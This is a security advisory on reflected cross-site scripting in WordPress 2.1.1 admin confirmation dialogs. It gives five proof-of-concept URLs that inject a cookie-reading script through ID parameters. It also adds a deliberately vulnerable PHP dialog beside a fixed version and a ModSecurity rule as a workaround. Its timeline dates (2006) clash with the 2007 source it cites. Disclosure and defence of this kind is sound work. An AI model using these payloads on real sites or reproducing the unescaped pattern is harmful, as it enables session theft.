"WordPress is a state-of-the-art semantic personal publishing platform with a focus on aesthetics, web standards, and usability." Multiple script injection vulnerabilities have been discovered in WordPress; these allow remote attackers to insert arbitrary HTML and/or JavaScript into the pages returned to the client.
Credit:
The information has been provided by Stefan Friedli - scip AG.
The original article can be found at: http://www.scip.ch/cgi-bin/smss/showadvf.pl?id=2962
Vulnerable Systems:
* WordPress version 2.1.1
Stefan Friedli found several vulnerabilities based on an advisory entitled "WordPress AdminPanel CSRF/XSS - 0day" by "Samenspender", which described a lack of input validation when deleting posts that allows injection of arbitrary code. The vulnerability was reported on February 26th and is referenced in section VII.
That vulnerability was limited to manipulating the "post" parameter, but there are several other vulnerabilities that are very similar to it. Every operation that makes use of the common confirm dialog is vulnerable to this type of attack.
Possible injection...
... when deleting posts as mentioned in Samenspender's advisory (unvalidated parameter: post, file: post.php)
http://target.tld/wp-admin/post.php?action=delete&post='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
... when deleting comments (unvalidated parameter: c, file: comment.php)
http://target.tld/wp-admin/comment.php?action=deletecomment&p=39&c='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
... when deleting pages (unvalidated parameter: page, file: page.php)
http://target.tld/wp-admin/page.php?action=delete&post='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
... when deleting categories (unvalidated parameter: cat_ID, file: categories.php)
http://target.tld/wp-admin/categories.php?action=delete&cat_ID='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
... when deleting comments (unvalidated parameter: c, file: comment.php)
http://target.tld/wp-admin/comment.php?action=deletecomment&p=35&c='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Impact:
This list may not be exhaustive. It illustrates that the flaw in WordPress confirmation dialogs is not limited to the "Delete Post" function. Fixing the validation of the post parameter alone, as suggested by e.g. Secunia, does not fix the problem and does not reduce the threat of cross-site scripting or any other web-based exploitation.
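The pattern behind every entry in the list above is the same: an ID parameter is echoed unescaped into the markup of the confirmation dialog, inside a single-quoted attribute, so a value beginning with '> terminates the attribute and the rest is parsed as new markup. The following is an added PHP example written for this page to show that pattern beside its fix; it is not WordPress code and does not reproduce the real post.php/comment.php source. The function names render_confirm_vulnerable, render_confirm_fixed and esc, and the sample form markup, are assumptions.

```php
<?php
// Added example: a minimal model of an "Are you sure?" confirmation dialog
// that reflects a request parameter into the page. NOT WordPress code; the
// function names and the markup are hypothetical.

// Vulnerable variant: the raw parameter is placed inside a single-quoted
// attribute. A value that starts with '> closes the attribute and the tag,
// and everything after it is interpreted as new HTML by the browser.
function render_confirm_vulnerable(string $action, string $id): string
{
    return "<form method='post' action='post.php'>"
         . "<input type='hidden' name='action' value='$action' />"
         . "<input type='hidden' name='post' value='$id' />"
         . "<p>Are you sure you want to delete item $id?</p>"
         . "<input type='submit' value='Yes' /></form>";
}

// Escape helper for text placed into HTML attributes or element content.
// ENT_QUOTES makes sure both ' and " are neutralised, which matters here
// because the dialog uses single-quoted attributes.
function esc(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES, 'UTF-8');
}

// Hardened variant. Two independent measures are applied:
//  1. the ID is a database row id, so it is cast to an integer and anything
//     that does not yield a positive number is rejected outright;
//  2. every value echoed into the markup is escaped, whatever parameter it
//     came from. Measure 1 closes this particular hole; measure 2 is the
//     general rule that also covers c, cat_ID, page and any other reflected
//     value, which is the point the advisory's Impact section makes.
function render_confirm_fixed(string $action, string $id): string
{
    $id_int = (int) $id;            // "'><script>..." casts to 0
    if ($id_int <= 0) {
        return "<p>Invalid item id.</p>";
    }
    $safe_id = esc((string) $id_int);
    return "<form method='post' action='post.php'>"
         . "<input type='hidden' name='action' value='" . esc($action) . "' />"
         . "<input type='hidden' name='post' value='" . $safe_id . "' />"
         . "<p>Are you sure you want to delete item " . $safe_id . "?</p>"
         . "<input type='submit' value='Yes' /></form>";
}

// Constructed sample input: the URL-decoded form of the advisory's test
// value, i.e. what $_GET['post'] would hold for that query string.
$sample = urldecode("'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E");

echo "--- vulnerable output ---\n", render_confirm_vulnerable('delete', $sample), "\n\n";
echo "--- fixed output, hostile value ---\n", render_confirm_fixed('delete', $sample), "\n\n";
echo "--- fixed output, legitimate id ---\n", render_confirm_fixed('delete', '42'), "\n";

// The vulnerable output contains a live <script> element; the fixed variant
// rejects the hostile value and reflects only digits for a legitimate id.
assert(strpos(render_confirm_vulnerable('delete', $sample), '<script>') !== false);
assert(strpos(render_confirm_fixed('delete', $sample), '<script>') === false);
assert(strpos(render_confirm_fixed('delete', '42'), "value='42'") !== false);
```

Run it with `php example.php`. The integer cast is the cheap, specific fix for integer ids; the escaping is what prevents the same class of bug from reappearing the next time a confirm dialog reflects a parameter that is not an integer.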
Temporary Solution:
Until these issues are patched, possible workarounds are manual fixing or the use of an application-level filter such as mod_security for Apache.
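As an added example of the application-level filter workaround (not part of the original advisory, and not a WordPress or scip AG rule set), the following ModSecurity 2.x rule chain rejects any request to the four admin scripts named above in which one of the reflected id parameters contains anything but digits. The rule id and the log message are assumptions; the script and parameter names are taken from the injection list above.

```apache
# Added example for the mod_security workaround; not from the advisory.
# Requires mod_security 2.x. The rule id and msg text are assumptions.
SecRuleEngine On

# First link of the chain: only the admin scripts listed in the advisory ...
SecRule REQUEST_FILENAME "@rx /wp-admin/(post|comment|page|categories)\.php$" \
    "phase:2,id:900101,deny,status:403,log,msg:'Non-numeric id passed to WordPress admin confirm dialog',chain"
    # ... second link: and only when one of the reflected id parameters is
    # not purely numeric. Each of these is a database row id, so a value
    # containing quotes, angle brackets or anything else but digits is
    # rejected before the script ever reflects it.
    SecRule ARGS:post|ARGS:c|ARGS:cat_ID|ARGS:page "!@rx ^[0-9]*$" "t:none,t:urlDecodeUni"
```

Because the advisory states that its parameter list may not be exhaustive, this rule only narrows the window; a broader rule on ARGS for the whole /wp-admin/ path, or the vendor patch, is what actually closes it.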
Sources:
Samenspender - WordPress AdminPanel CSRF/XSS - 0day http://seclists.org/bugtraq/2007/Feb/0494.html
Disclosure Timeline:
02/26/06 - Release of "Delete Post"-Confirmation Vulnerability
02/27/06 - Identification of further vulnerabilities
02/27/06 - Immediate Release for informational purposes